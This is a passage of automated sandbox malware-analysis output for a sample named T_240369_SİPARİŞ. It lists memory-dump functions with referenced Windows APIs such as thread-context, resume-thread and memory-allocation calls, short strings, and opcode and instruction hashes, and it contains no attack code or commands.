Function 05D14D99 Relevance: 1.6, APIs: 1, Instructions: 95threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 05D14E4F

Memory Dump Source

Source File: 00000000.00000002.1650663027.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d10000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 8b2c3c760804620fcdd3f5d9940799444753ba02a88b28e744543fd4cf3eda6d
Instruction ID: 1bb24d5988e9fc362cd2541a6e2404835e91861d96f7711e2d951cb3437ffb23
Opcode Fuzzy Hash: 8b2c3c760804620fcdd3f5d9940799444753ba02a88b28e744543fd4cf3eda6d
Instruction Fuzzy Hash: 54419DB5D012589FCB10CFA9D985ADEFBF1BF49314F24802AE419B7250D738A945CF58

Uniqueness

Uniqueness Score: -1.00%

Function 05D14DA0 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 05D14E4F

Memory Dump Source

Source File: 00000000.00000002.1650663027.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d10000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 91e780bbb1a375a36c47f6894bae5a8552792c339982c9d5f560c20ad60b99cb
Instruction ID: 2dcd564f7b61d5367f33f5b2fd771f8f60ac33d8b79a609708ef364b893aa34d
Opcode Fuzzy Hash: 91e780bbb1a375a36c47f6894bae5a8552792c339982c9d5f560c20ad60b99cb
Instruction Fuzzy Hash: 9D31AEB5D012589FCF10CFA9D984ADEFBF1BB49314F24802AE415B7250D738A945CF58

Uniqueness

Uniqueness Score: -1.00%

Function 05D15A70 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 05D15AF6

Memory Dump Source

Source File: 00000000.00000002.1650663027.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d10000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 3df14bfa31a0650369d9960af79776881388c1f61b682ccf59ae30ec7d3184a4
Instruction ID: 05eb72224b1ae6b43741ca3ade8c91b545578b0b36faaa2c4ac87ae17425285d
Opcode Fuzzy Hash: 3df14bfa31a0650369d9960af79776881388c1f61b682ccf59ae30ec7d3184a4
Instruction Fuzzy Hash: 5331ACB9D012589FCB14CFA9E585ADEFBB1BF49314F14942AE815B7310C738A941CF58

Uniqueness

Uniqueness Score: -1.00%

Function 05D15A78 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 05D15AF6

Memory Dump Source

Source File: 00000000.00000002.1650663027.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d10000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: c2d8c74034e5e3fe9ce837e37778c62b2ef319bc6e2dd7765f58d6b1432cfb5a
Instruction ID: 94a6addde0cc6e9c73595acf9b6f786781f2932a65509991e51fbe305ebf4668
Opcode Fuzzy Hash: c2d8c74034e5e3fe9ce837e37778c62b2ef319bc6e2dd7765f58d6b1432cfb5a
Instruction Fuzzy Hash: EF31ACB4D012589FCB14CFA9E985ADEFBB5BB49320F10942AE815B7310C739A941CF98

Uniqueness

Uniqueness Score: -1.00%

Function 05ADD7CB Relevance: 1.6, Strings: 1, Instructions: 310COMMON

Download Yara Rule

Strings

Hbq, xrefs: 05ADD8E1

Memory Dump Source

Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: Hbq
API String ID: 0-1245868
Opcode ID: 98a69b44ba6cb4e85ec5529faca930aaf1a3724b2cfbb49ca6feb7cd720f33b8
Instruction ID: 7efb70b3594450da4c004c328f8fdcb749de01f94c0083d1e0d74c6ab69ee819
Opcode Fuzzy Hash: 98a69b44ba6cb4e85ec5529faca930aaf1a3724b2cfbb49ca6feb7cd720f33b8
Instruction Fuzzy Hash: D9D11D35A00209DFCB04EFA4D594DADBBB2FF89310F118569E906AB364DB34ED46CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05AD9179 Relevance: 1.5, Strings: 1, Instructions: 227COMMON

Download Yara Rule

Strings

4'^q, xrefs: 05AD93A2

Memory Dump Source

Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: d73f6d4dadcfe072a46cc8858ca2cfe56b68c4028d8323b2c8e435face516135
Instruction ID: 3def80ddde88cf9a5c7139aab4a88fcc34320e2ff85b04022a6114aaee370c6e
Opcode Fuzzy Hash: d73f6d4dadcfe072a46cc8858ca2cfe56b68c4028d8323b2c8e435face516135
Instruction Fuzzy Hash: 82A1CA34A10218DFCB04EBA4D998E9DFBB2FF88301F118159E506AB3A5DB34EC46CB51

Uniqueness

Uniqueness Score: -1.00%

Function 05B724B8 Relevance: 1.5, Strings: 1, Instructions: 212COMMON

Download Yara Rule

Strings

(bq, xrefs: 05B72651

Memory Dump Source

Source File: 00000000.00000002.1649369753.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b70000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: 65399b2c37a122b3aebff801934ebfcbad309cc31b9c82a5b79948150c3ba99e
Instruction ID: 100c2bc56e6757e36415a7cf34e989363bb6504a7b7597644c9b7be0b388cd57
Opcode Fuzzy Hash: 65399b2c37a122b3aebff801934ebfcbad309cc31b9c82a5b79948150c3ba99e
Instruction Fuzzy Hash: 8D713A75B006098FCB14DBA9D99466EFBF3FFC8310F2485A9D42AA7794DB30E9018B51

Uniqueness

Uniqueness Score: -1.00%

Function 05ADC980 Relevance: 1.5, Strings: 1, Instructions: 201COMMON

Download Yara Rule

Strings

4'^q, xrefs: 05ADCA92

Memory Dump Source

Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 7abaa3af6812a35b3478b45224ddca9ad093c70bae4506eb28b1bbda0877e821
Instruction ID: b5cb980930fedd7a0b9e89558786110c3b7d4b84f3f9fbb21541af3a6c379f71
Opcode Fuzzy Hash: 7abaa3af6812a35b3478b45224ddca9ad093c70bae4506eb28b1bbda0877e821
Instruction Fuzzy Hash: EE711F35B402189FDB04EB64D564FAEB7B7BB88710F508468E506AB3A4CF75EC42CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05ADFB78 Relevance: 1.4, Strings: 1, Instructions: 188COMMON

Download Yara Rule

Strings

(bq, xrefs: 05ADFD99

Memory Dump Source

Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: 16f6ca3fa2aad4fe51bffddff911d3a30595a7abb3cdc51189fc87107b63291e
Instruction ID: 969559970b89e455cc2f42df5752fa348bad154bff1216a88dc9761b6070b2da
Opcode Fuzzy Hash: 16f6ca3fa2aad4fe51bffddff911d3a30595a7abb3cdc51189fc87107b63291e
Instruction Fuzzy Hash: 93714834710618CFCB04FB64D598EAEB7B6AF89700F508569D5039B3A4DF34AD46CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 05ADCDA9 Relevance: 1.4, Strings: 1, Instructions: 186COMMON

Download Yara Rule

Strings

4'^q, xrefs: 05ADCE62

Memory Dump Source

Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: ddda052b618ed7eae7ef8a0d367881700a7b9c4d84f12f34d7b10290e3da8427
Instruction ID: e41688e77277b0069399cca7c920f68a42ac9da73b162df945b65be053f41e4a
Opcode Fuzzy Hash: ddda052b618ed7eae7ef8a0d367881700a7b9c4d84f12f34d7b10290e3da8427
Instruction Fuzzy Hash: 04518D35B002158FCB14BB65C598DAEF7B6EF88710F50452AE507AB394CF74AC46CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 05ADDE78 Relevance: 1.4, Strings: 1, Instructions: 143COMMON

Download Yara Rule

Strings

(bq, xrefs: 05ADDFA4

Memory Dump Source

Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: 4091e522e29182c564cde660faea2d73bed0caa3ba8ea7673689fbf6f5313a8d
Instruction ID: 7195c9bfc31ff95389032481d2aefb3ca0491a8a5b899508a3cb60f91d71c0c6
Opcode Fuzzy Hash: 4091e522e29182c564cde660faea2d73bed0caa3ba8ea7673689fbf6f5313a8d
Instruction Fuzzy Hash: 39416D36704114AFCB159F68D814E59BFB6FF99710B1680AAE20ACF3B2CA35D812DB51

Uniqueness

Uniqueness Score: -1.00%

Function 02F6C388 Relevance: 1.4, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

TJcq, xrefs: 02F6C416

Memory Dump Source

Source File: 00000000.00000002.1636454530.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f60000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: TJcq
API String ID: 0-1911830065
Opcode ID: a8b1ce0029613cd9bd62fb64f6628bc34117037e5ae8f822faa702c198672e56
Instruction ID: 452fed1b6fd921d3b397b36309bbad2a55f3fee22e3147de0e6dd0824370eb67
Opcode Fuzzy Hash: a8b1ce0029613cd9bd62fb64f6628bc34117037e5ae8f822faa702c198672e56
Instruction Fuzzy Hash: 3451F275E00208DFCB04DFA9D999AADBBF2FF88300F10942AE956A7350DB786945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 02F6C378 Relevance: 1.4, Strings: 1, Instructions: 122COMMON

Download Yara Rule

Strings

TJcq, xrefs: 02F6C416

Memory Dump Source

Source File: 00000000.00000002.1636454530.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f60000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: TJcq
API String ID: 0-1911830065
Opcode ID: c20a5f961195c057614f7be95fab554b10f54d7a7a7b1594037b1312fb15d68c
Instruction ID: 60a1685e1ff3246e7bd15db48b858d3725221ebdf490aa9380bf70aad7396725
Opcode Fuzzy Hash: c20a5f961195c057614f7be95fab554b10f54d7a7a7b1594037b1312fb15d68c
Instruction Fuzzy Hash: D85123B5E00208DFCB04DFA8D9596ADBBF2FF88300F14942AE955A7350DB786945CF44

Uniqueness

Uniqueness Score: -1.00%

Function 02F6FE38 Relevance: 1.4, Strings: 1, Instructions: 119COMMON

Download Yara Rule

Strings

pbq, xrefs: 02F6FE80

Memory Dump Source

Source File: 00000000.00000002.1636454530.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f60000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: pbq
API String ID: 0-3896149868
Opcode ID: 212111cf8585bb9562ccb829d4d7ea2f37d3042c9be53e557f366fd476c13d81
Instruction ID: ec074aa14b6b45f4d295745e759cd91d4cea026ff820bdf1d6aa0ceb630bafb1
Opcode Fuzzy Hash: 212111cf8585bb9562ccb829d4d7ea2f37d3042c9be53e557f366fd476c13d81
Instruction Fuzzy Hash: 5241E676600104AFCB4A9FA8C954D69BBF7FF8D3147168494E2099B276DB32DC22EB50

Uniqueness

Uniqueness Score: -1.00%

Function 05B46230 Relevance: 1.4, Strings: 1, Instructions: 118COMMON

Download Yara Rule

Strings

@pM2, xrefs: 05B4630B

Memory Dump Source

Source File: 00000000.00000002.1649183304.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b40000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: @pM2
API String ID: 0-1671532473
Opcode ID: 935e9916b42b0499074c3be890b63324c4c5c27e1ed63bd8f2e0222cff44a3c8
Instruction ID: cb98dfdd77aeb6e0826f11724448811e4b3ca9ab4bf9059ef86c9d12b240586a
Opcode Fuzzy Hash: 935e9916b42b0499074c3be890b63324c4c5c27e1ed63bd8f2e0222cff44a3c8
Instruction Fuzzy Hash: D6510574D00208CFDB68CFA9D584A9DBBB2FF49304F20816AE419AB361DB31A941DF40

Uniqueness

Uniqueness Score: -1.00%

Function 05AD0BB0 Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

,bq, xrefs: 05AD0C13

Memory Dump Source

Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: ,bq
API String ID: 0-2474004448
Opcode ID: 4935c87567685d367a407f828f9a4fe5adbef33e85ec197d3eb835a03269f47f
Instruction ID: 64362c48946b6aeb155550f04940a34606b7f0c2c46e5a390f015781e509e4b7
Opcode Fuzzy Hash: 4935c87567685d367a407f828f9a4fe5adbef33e85ec197d3eb835a03269f47f
Instruction Fuzzy Hash: 944169357401198FCB04EF69C8549AEBBF2FF85350F25806AE906DB361DB31EC418BA1

Uniqueness

Uniqueness Score: -1.00%

Function 05E7FC28 Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

(bq, xrefs: 05E7FC3C

Memory Dump Source

Source File: 00000000.00000002.1650702212.0000000005E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e60000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: a3c236f980ec4d7fa46601fffe888b75d7dbf2cc0542b52fad03583e0e529abd
Instruction ID: 3412f4c709e24e884b454dd211872a3a69c912c57365ad96987016c64a51034c
Opcode Fuzzy Hash: a3c236f980ec4d7fa46601fffe888b75d7dbf2cc0542b52fad03583e0e529abd
Instruction Fuzzy Hash: 5841C031A0021ACFCB00CF28C484A6AFBB1FF49324F25969AD965AB381C730F951CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 05ADC821 Relevance: 1.4, Strings: 1, Instructions: 113COMMON

Download Yara Rule

Strings

4'^q, xrefs: 05ADC8D7

Memory Dump Source

Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 62c5969e5041f017a89df0fce5187e05043de522ba8369f28263440593b605ae
Instruction ID: 8a10a6e1ceecf9b0f6a9ddee1bf21be2f466ab7dfbcaef52eecd6bbaca8bc60f
Opcode Fuzzy Hash: 62c5969e5041f017a89df0fce5187e05043de522ba8369f28263440593b605ae
Instruction Fuzzy Hash: D2314E357406149FD308EB69C968F2ABBA6AFC8714F118458E1068B3A5DE75EC42C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 05ADC830 Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

4'^q, xrefs: 05ADC8D7

Memory Dump Source

Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 11a86286b725e3be9cea607fa17f261aa7d75ac955b8c006fe83cda132b376be
Instruction ID: 425493e73c57c98492f832e165e1caeed4d83166db0aaadf3be6be6e3dd39964
Opcode Fuzzy Hash: 11a86286b725e3be9cea607fa17f261aa7d75ac955b8c006fe83cda132b376be
Instruction Fuzzy Hash: 65313E357406149FD308EB69C968F2AB7E6AFC8714F104468E5068F3A5DF75EC42C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 05C0E7C0 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 05C0E85F

Memory Dump Source

Source File: 00000000.00000002.1650051244.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b09c6295f3878c2203551424488d9cf18257e503926d706ba778cc723c4ae259
Instruction ID: 9f4f9712d3855cc07bc791cceb52a64ac248cf92d5295f505502de762cb7fce0
Opcode Fuzzy Hash: b09c6295f3878c2203551424488d9cf18257e503926d706ba778cc723c4ae259
Instruction Fuzzy Hash: 0831B8B8D002589FCF10CFA9D884ADEFBB5BB49320F24942AE815B7210C735A945CF98

Uniqueness

Uniqueness Score: -1.00%

Function 05AD81F0 Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

4'^q, xrefs: 05AD8239

Memory Dump Source

Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: efc88823d7531113414864bc01c9d3f061611a5db1c408e83422a2ab90c8cddc
Instruction ID: 30c42cb4b54a5d3c6aabbb5edfcb8e3d665211a36af0661ab8e67ffd7da5d3b9
Opcode Fuzzy Hash: efc88823d7531113414864bc01c9d3f061611a5db1c408e83422a2ab90c8cddc
Instruction Fuzzy Hash: C33195367001099FCB05AF94C858D5ABBB7FF88310B1540A9E9069B3B5DA75EC46CB50

Uniqueness

Uniqueness Score: -1.00%

Function 05ADCE17 Relevance: 1.3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

Strings

4'^q, xrefs: 05ADCE62

Memory Dump Source

Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 8394b230550b44c618c720b7c9dda920f4e4d824fd6d05840250b2386f48b22a
Instruction ID: 43646642a2e3175cbf21ce6141e78b8bf82dbb4d30848f84b6190363214ab678
Opcode Fuzzy Hash: 8394b230550b44c618c720b7c9dda920f4e4d824fd6d05840250b2386f48b22a
Instruction Fuzzy Hash: CE217531B002199BCB14BB55C458AAEFBBBABC9610F50441ED507EB394CF789C06D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 05AD0A20 Relevance: 1.3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

p`^q, xrefs: 05AD0A86

Memory Dump Source

Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: p`^q
API String ID: 0-26641872
Opcode ID: b656970b7bfcdfb11999e692c0b164050f852795a54c22fe02c6e877b281e4a2
Instruction ID: ad0c7d962e77e6fd15c845a1983117765df89b38db11c203324d4ac8579eadca
Opcode Fuzzy Hash: b656970b7bfcdfb11999e692c0b164050f852795a54c22fe02c6e877b281e4a2
Instruction Fuzzy Hash: 7F31A736E0121A8FCB10DF94D889EAEFBB1FB44750F144529E512A7261E734AA45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 059B248B Relevance: 1.3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

4'^q, xrefs: 059B2827

Memory Dump Source

Source File: 00000000.00000002.1648735395.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59b0000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: cd4b04ead29e779f08c60f952ad18fa2d84385eed3d73284e3446259dac5625d
Instruction ID: 2247af19747dcf8591f8168c3ef744f8741ddee22c25b72555344542aa9c431e
Opcode Fuzzy Hash: cd4b04ead29e779f08c60f952ad18fa2d84385eed3d73284e3446259dac5625d
Instruction Fuzzy Hash: E7314975D04209CFEF08CFA9C5546EEBBB2FF85301F14846AC015AB260DB745A46CF51

Uniqueness

Uniqueness Score: -1.00%

Function 059B0D7B Relevance: 1.3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

4'^q, xrefs: 059B1549

Memory Dump Source

Source File: 00000000.00000002.1648735395.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59b0000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 285a52c289cb20ce0504ab68dfa71b2f11fbdfc69e25b9fd0ec56adb8727a920
Instruction ID: 9a7b5c20cb568608f6e56fd7bd8264c6833d5a1003ab708bdd38c60c01a1fc61
Opcode Fuzzy Hash: 285a52c289cb20ce0504ab68dfa71b2f11fbdfc69e25b9fd0ec56adb8727a920
Instruction Fuzzy Hash: 66318B34D04209CFEB19CFA9C6196EEBBB2FB85301F10846AD011A7291DB746A46CF91

Uniqueness

Uniqueness Score: -1.00%

Function 05AD3900 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

p<^q, xrefs: 05AD393A

Memory Dump Source

Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: p<^q
API String ID: 0-1680888324
Opcode ID: 6d4ec71e2c7b75ec3810444c5551adf2024349ff28e4a197344fe4a92790403a
Instruction ID: 487696cb24f49ef4858ff27dfaefa29bec276aae90e27d74508885b92764e231
Opcode Fuzzy Hash: 6d4ec71e2c7b75ec3810444c5551adf2024349ff28e4a197344fe4a92790403a
Instruction Fuzzy Hash: 0E2157703041849FCB01DF2AC854EAABBEABF8A210B044496FC66CB361CA31EC51CB31

Uniqueness

Uniqueness Score: -1.00%

Function 05AD38F1 Relevance: 1.3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

Strings

p<^q, xrefs: 05AD393A

Memory Dump Source

Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: p<^q
API String ID: 0-1680888324
Opcode ID: f8243f92c347e3dbcf753d052a8d9f95bc0d1eda4bd34183aea5a948f499215f
Instruction ID: 03e9e0ee1c051160664f82ad8f3e0c6073ca987726e96b9cf3fea09076dc4cfa
Opcode Fuzzy Hash: f8243f92c347e3dbcf753d052a8d9f95bc0d1eda4bd34183aea5a948f499215f
Instruction Fuzzy Hash: FD2158713041949FCB15DF2AC854EAABBF6BF8E210B158496F85ACB371CA31DC52CB21

Uniqueness

Uniqueness Score: -1.00%

Function 05AD0BA0 Relevance: 1.3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

,bq, xrefs: 05AD0C13

Memory Dump Source

Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: ,bq
API String ID: 0-2474004448
Opcode ID: ad2c0f54577e6105eff6543c111c31b09c6d75f101392d84828f9db2557b2986
Instruction ID: dd70781b747aa6188ba52b1566fddcbd06bc9e669dcba9d9413cb2a3c25e552f
Opcode Fuzzy Hash: ad2c0f54577e6105eff6543c111c31b09c6d75f101392d84828f9db2557b2986
Instruction Fuzzy Hash: F6117C35A401058FCB04DF69C898AAEBBF6FF85310F248065E906DB361DB30EC01CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02F61FE2 Relevance: 1.3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

Strings

8bq, xrefs: 02F62022

Memory Dump Source

Source File: 00000000.00000002.1636454530.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f60000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: 8bq
API String ID: 0-187764589
Opcode ID: 5971d3b7674a50f1af901f0d9b6d62f6ef7662af58660222bbddd85b6b987ef4
Instruction ID: adeabaaf250ce89646906c48797e0a986e579e3f2b53d766f512c44f70c53755
Opcode Fuzzy Hash: 5971d3b7674a50f1af901f0d9b6d62f6ef7662af58660222bbddd85b6b987ef4
Instruction Fuzzy Hash: F001F575B042049FD308976DE458B7A7BA6FBCA750F00446AE10ACB3A9DB798C46CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02F61FF0 Relevance: 1.3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

Strings

8bq, xrefs: 02F62022

Memory Dump Source

Source File: 00000000.00000002.1636454530.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f60000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: 8bq
API String ID: 0-187764589
Opcode ID: 4eface02f4e9447926bcb32514b885698258d88654e14211daaec50e1467533e
Instruction ID: 3368ff686f053797102ce3026bbfc4876089f2409bd07d0b2631a8c1ba8e9801
Opcode Fuzzy Hash: 4eface02f4e9447926bcb32514b885698258d88654e14211daaec50e1467533e
Instruction Fuzzy Hash: E601A2357041089FD308A76DE558B7A77DAF7C9755F004425E20ACB3A8DB75DC41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05B7E4AB Relevance: 1.3, Strings: 1, Instructions: 30COMMON

Download Yara Rule

Strings

#, xrefs: 05B7E4CD

Memory Dump Source

Source File: 00000000.00000002.1649369753.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b70000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 8e0068f479d5ef3018c3a96ff7fe49eb05d069f5e968944df1e14d91d9e63858
Instruction ID: d5bcb3a8a0736276df682f157a95136abf36e04df6385d54c75538bb18c210c5
Opcode Fuzzy Hash: 8e0068f479d5ef3018c3a96ff7fe49eb05d069f5e968944df1e14d91d9e63858
Instruction Fuzzy Hash: B201B23490420CDFEB20DFA4D488BAD7BB6FF09305F1450A5E55AAB290CB75A9C8CF11

Uniqueness

Uniqueness Score: -1.00%

Function 02F62320 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

{, xrefs: 02F62335

Memory Dump Source

